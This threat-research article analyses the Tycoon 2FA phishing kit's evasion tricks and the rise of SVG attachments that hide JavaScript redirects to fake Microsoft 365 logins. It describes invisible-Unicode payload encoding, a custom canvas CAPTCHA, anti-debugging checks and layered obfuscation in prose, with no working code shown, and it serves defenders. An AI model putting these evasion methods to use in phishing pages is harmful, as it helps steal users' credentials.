Summary

The Tycoon 2FA phishing kit has adopted several new evasion techniques aimed at slipping past endpoints and detection systems. These include using a custom CAPTCHA rendered via HTML5 canvas, invisible Unicode characters in obfuscated JavaScript, and anti-debugging scripts to thwart inspection. The Trustwave SpiderLabs Email Security team has also identified a major spike in SVG image-based attacks, where harmless-looking graphics are being used to hide dangerous links. This article takes a closer look at these methods to better understand how this kit is evolving and what defenders should be aware of.

Tycoon 2FA

1. Obfuscation Using Invisible Unicode Characters and Proxies

Lately, the Tycoon 2FA landing pages have incorporated a clever obfuscation technique using invisible Unicode characters. This technique, when paired with JavaScript Proxy objects, is designed to complicate static analysis and defer script execution until runtime. This behavior is demonstrated in a real-world Tycoon 2FA phishing landing page, as shown in this Urlscan.io session: https://urlscan.io/result/0195c73f-bfd0-7000-8386-94b11ace6088/dom/

Tycoon is using specific invisible Unicode characters to encode binary data:

Halfwidth Hangul Filler to represent binary 0

○ UTF-16: 0xFFA0

○ UTF-8: EF BE A0
Hangul Filler to represent binary 1

○ UTF-16: 0x3164
○ UTF-8: E3 85 A4

The screenshot below shows how these invisible Unicode characters are converted into their escaped Unicode representations using CyberChef:

In figure 3, the encoded characters are joined into a binary string, which is then split into 8-bit segments (bytes). Each byte is then converted into its corresponding character. When an attacker wants to execute a script, they encode it using these invisible Unicode characters to represent binary.

The decoding mechanism is shown in figure 4 below:

As seen in figure 4, the property name on the obfEvaluator proxy becomes the carrier of the payload. Once accessed, it triggers the decoder and dynamically evaluates the reconstructed JavaScript code.

This method:

Makes the payload invisible to the human eye.
Evades static analysis and simple pattern-matching.
Delays execution until runtime, often only when specific conditions are met.

Combined with other evasion layers, this approach adds a frustrating layer of indirection for analysts and defenders.

2. From Cloudflare Turnstile to Custom CAPTCHA

Previously, many phishing kits — including Tycoon 2FA — leaned on third-party CAPTCHA services like Cloudflare Turnstile. These services offered basic anti-bot protection, but they also introduced a weak point for defenders. Security teams could more easily fingerprint and block phishing pages using recognizable third-party elements.

Tycoon has now pivoted to a custom CAPTCHA solution, likely in an attempt to reduce its detectability and increase friction for automated analysis tools. The CAPTCHA is rendered using an HTML5 canvas element with randomized characters, background noise, and slight distortions.

A simplified version of the CAPTCHA mechanism is shown in Figure 6 below:

If CAPTCHA verification fails, a new one is generated. If successful, it sends form data and fetches instructions from an attacker-controlled server. If the server responds with an error or a non-expected value, it injects a webpage using base64-decoded HTML, loading a decoy page.

This technique is more than cosmetic; it helps Tycoon blend into legitimate login workflows while allowing the attacker to dynamically serve decoys or reroute victims.

3. Anti-Debugging JavaScript

Tycoon 2FA also includes anti-debugging scripts to hinder researchers and slow down detection:

This script:

Detects browser automation (navigator.webdriver, PhantomJS, Burp Suite)
Blocks dev tools shortcuts (F12, Ctrl+Shift+I, Ctrl+U, etc.)
Prevents right-click (disabling "Inspect Element")
Uses debugger with a timing check to detect if execution is paused by a debugger
Redirects to another site (rakuten.com) if analysis is suspected

These layers of obfuscation and evasion make dynamic analysis harder and extend the lifespan of phishing campaigns.

What This Means for Defenders

The recent updates to the Tycoon 2FA kit show a clear move toward stealth and evasion. While none of these techniques are groundbreaking individually, their combined use can complicate detection and response.

HTML5-based visuals like the custom CAPTCHA can mislead users and add legitimacy to phishing attempts.
Unicode and Proxy-based obfuscation can delay detection and make static analysis more difficult.
Anti-debugging behaviors may hide malicious activity from researchers and automated tools.

Security teams should consider behavior-based monitoring, browser sandboxing, and a deeper inspection of JavaScript patterns to stay ahead of these tactics.

YARA Detection Rule

CyberChef Recipe to Decode the Tycoon2FA Javascript

SVG-Borne Phishing Attacks

Background of Image-based Attacks

Cybercriminals have long leveraged image-based attacks to evade security defenses. One of the earliest examples of this was image spam in the early 2000s which emerged to bypass traditional text-based detections. Over the following years, attackers adopted new image-based techniques, notably QR-code phishing during the 2010s, which grew significantly and became a widespread threat by 2023.

Also during the 2010s, threat actors have used steganography - the practice of hiding data within another file or media — to conceal malicious code or stolen data within image files.

In 2017, Trustwave SpiderLabs identified another form of image-based attack via SVG files to embed scripts that will download Ursnif malware from a remote resource.

Rise in SVG-based Threats, Driven by PhaaS platforms

SVG-based attacks have sharply pivoted toward phishing campaigns, with a staggering 1800% increase in early 2025 compared to data collected since April 2024. A notable surge in campaigns was observed in Q1 of 2025, peaking in March. These are driven largely by the emergence of Attack-in-the-middle (AITM) Phishing-as-a-Service (PhaaS) platforms such as Tycoon2FA, which have significantly amplified the effectiveness and prevalence of these deceptive tactics.

What is an SVG File?

VG (Scalable Vector Graphics) files are vector-based images commonly used for crisp logos, icons, and graphics due to their ability to scale without losing quality. Unlike typical image formats like JPEG or PNG, SVG files are based on XML (Extensible Markup Language), allowing them to contain interactive elements and scripts. This flexibility has made SVG files increasingly popular across websites, applications, and digital marketing platforms, serving diverse visual needs efficiently.

Example SVG:

The example code below is a benign SVG file that renders the Microsoft logo. It utilizes the element to define the shapes and colors of the logo's graphical components.

Rendered Microsoft logo in SVG:

How Cybercriminals Exploit SVG Files for Attacks

While SVG (Scalable Vector Graphics) files are widely used in web design and branding, their ability to embed JavaScript also introduces serious cybersecurity risks.

Cybercriminals exploit this feature by inserting malicious scripts directly into SVG files. These scripts can execute automatically upon opening the file, enabling a wide range of cyberattacks, including unauthorized system access, data theft, identity compromise, and leakage of sensitive information.

The primary cybersecurity risks posed by malicious SVG files include:

Automatic execution of concealed malicious scripts without explicit user interaction.
Difficulty for conventional security filters and antivirus tools to detect and block threats effectively.
False sense of safety among users who typically view SVG files as harmless image content.

File Comparison: SVG vs. PDF, DOC, HTML

To better understand the threat of SVG phishing, it is helpful to compare it with other common phishing file formats such as PDF, DOC, and HTML. This comparison helps evaluate the relative risks, delivery methods, and effectiveness of each format in bypassing security measures and deceiving users.

SVG Files

SVG phishing is highly effective because SVGs can embed JavaScript that executes automatically. Their harmless appearance and the lack of stringent security checks further heighten their appeal as phishing vectors.

PDF Files

PDF files are frequently employed in phishing attacks due to their ubiquity in business and official communications. Although PDFs can embed malicious links or scripts, executing these threats typically requires user interaction, such as clicking a link or button within the document. Moreover, PDFs often undergo rigorous scanning by security software, diminishing their effectiveness compared to SVG files.

DOC Files

Microsoft Word documents (DOC) commonly feature phishing attempts using embedded hyperlinks paired with enticing text or images. These links are crafted to appear legitimate and urge users to click, directing them toward phishing websites designed to capture credentials. Unlike SVGs, DOC files do not inherently execute scripts automatically unless part of a macro-based attack and rely heavily on user engagement and trust.

HTML Files

HTML phishing leverages embedded scripts that execute directly in browsers, often involving complex obfuscation techniques. Despite their direct threat potential, users are usually more cautious with HTML attachments due to increased awareness about their associated risks.

Browser and Email Client Handling of SVG Files

Web browsers such as Chrome, Firefox, Safari, and Edge natively handle SVG files and automatically execute embedded JavaScript without issuing security alerts. This makes SVG phishing highly effective, as users receive minimal warning about the potential risks.

In contrast, desktop email clients like Outlook and Thunderbird generally do not execute scripts within SVG files. Instead, they prompt users to open these files in an external browser, inadvertently increasing phishing risks by transferring the attack vector to a less secure environment.

In-the-Wild Campaigns

While HTML and PDF attachments remain popular in phishing campaigns due to their versatility, recent activity reveals a notable shift toward the use of SVG files as an alternative delivery mechanism. This lightweight, text-based image format is increasingly exploited by threat actors to embed JavaScript-based redirection, allowing them to act as stealthy intermediaries that funnel victims to credential-harvesting pages while evading traditional security filters.

This technique has been observed across campaigns linked to AiTM PhaaS platforms such as Tycoon2FA, Mamba2FA, and Sneaky2FA—all of which specialize in intercepting credentials and bypassing multi-factor authentication.

In one observed campaign (figure 18), attackers mimic a Microsoft Teams voicemail notification to lure victims into downloading a suspicious attachment. The phishing email carries a subject and body text resembling a legitimate Teams alert.

The attachment is deceptively named to appear like an audio file. Despite its .svg extension, the file is crafted to appear like a voice message. When clicked, it executes an embedded redirection code that leads users to a fake Office 365 login page.

This redirection is achieved through the abuse of the SVG element, which allows HTML and JavaScript to run inside the image. The SVG includes obfuscated script content encoded in base64, making it harder for traditional email security tools to detect.

As soon as the SVG loads, the script dynamically decodes the URL and appends the victim’s email as a fragment identifier. This method helps bypass email filters by hiding suspicious code inside an innocent-looking .svg file.

The spoofed landing page is convincingly designed to steal user credentials under the guise of M365 login.

Further investigation linked this campaign to the Mamba2FA Phishing-as-a-Service (PhaaS) platform. Mamba2FA is known for its advanced phishing kits and MFA-bypass capabilities, offering phishing operators all-in-one solutions to intercept and steal credentials even in protected environments.

Other Variants Observed in the Wild

While the core delivery method remains consistent, embedding JavaScript within SVG files to trigger redirects, the implementations vary widely.

Some campaigns use deceptive SVG icons, such as logos or cloud document previews, to lure clicks. Others employ different obfuscation layers, including base64 encoding, character fragmentation, JavaScript encoding tricks, and junk comments inserted throughout the code to evade detection.

The redirect destinations also differ, ranging from fake login pages to credential-harvesting gateways tied to various phishing kits and infrastructure.

Variant 1. Obfuscated SVG script used by Tycoon2FA Phishing-as-a-Service

This SVG phishing variant conceals its malicious URL through multiple obfuscation layers. Appearing as a standard vector graphic with dimensions of 400×250, it contains embedded JavaScript within a CDATA-wrapped block.

CDATA (Character Data) is an XML construct that allows raw text, including special characters like angle brackets and ampersands, to be embedded without being parsed. In this case, it enables attackers to insert executable JavaScript directly into the SVG without breaking the structure, helping hide the payload from basic inspection.

The script employs ROT13 encryption, Base64 decoding, and XOR encryption with a specific key to ensure the phishing URL remains hidden until execution. Upon execution, it redirects users to a phishing destination, automatically appending the target email as immediate input on the phishing page.

Variant 2. Logo-Based Staging and Redirect Technique

This SVG file combines graphical content with an embedded redirection script, creating a seemingly harmless image that covertly navigates users to another website.

The file defines an SVG image with specific dimensions (234×48 pixels) and a defined viewBox. It uses multiple elements to form shapes or text, all rendered in a uniform color.

Embedded within a CDATA-wrapped block, the JavaScript code defines a redirect function that sets a specific URL target. When the SVG loads in the browser (triggered by window.onload), the script automatically executes, immediately redirecting users to the intended phishing destination, which in this case, is a Google Drawings page.

Conclusion

The rise in SVG phishing suggests that threat actors are continuously expanding their tactics to bypass security measures beyond QR codes and the traditional methods, including links, HTML, and document-based attacks. Many of these campaigns are facilitated by phishing kits that operate as PhaaS platforms, making them more accessible and scalable for cybercriminals. Awareness and proactive security measures are vital in combating this subtle yet increasingly prevalent threat.

To effectively combat this increasingly prevalent threat, users and organizations should:

Consider blocking or flagging SVG attachments: Evaluate the option of blocking emails with SVG attachments or, at a minimum, flagging them with a warning.
Be cautious with attachments and links: Treat unexpected files and embedded links with suspicion, especially if they come from unknown or unverified sources.
Verify authenticity: Double-check senders and content, especially with urgent or unsolicited messages.
Train employees regularly: Provide ongoing education on phishing trends and techniques to help users recognize and respond to threats.
Use advanced protection: Implement robust filtering and threat-detection systems to proactively block malicious threats like SVG-based attachments. Tools like Trustwave MailMarshal offer layered protection against email threats.
Implement MFA methods with extra layers: Strengthen defenses with phishing-resistant methods like FIDO2 and implement conditional access, continuous authentication, and session monitoring.

Tycoon2FA phishing kit targets Microsoft 365 with new tricks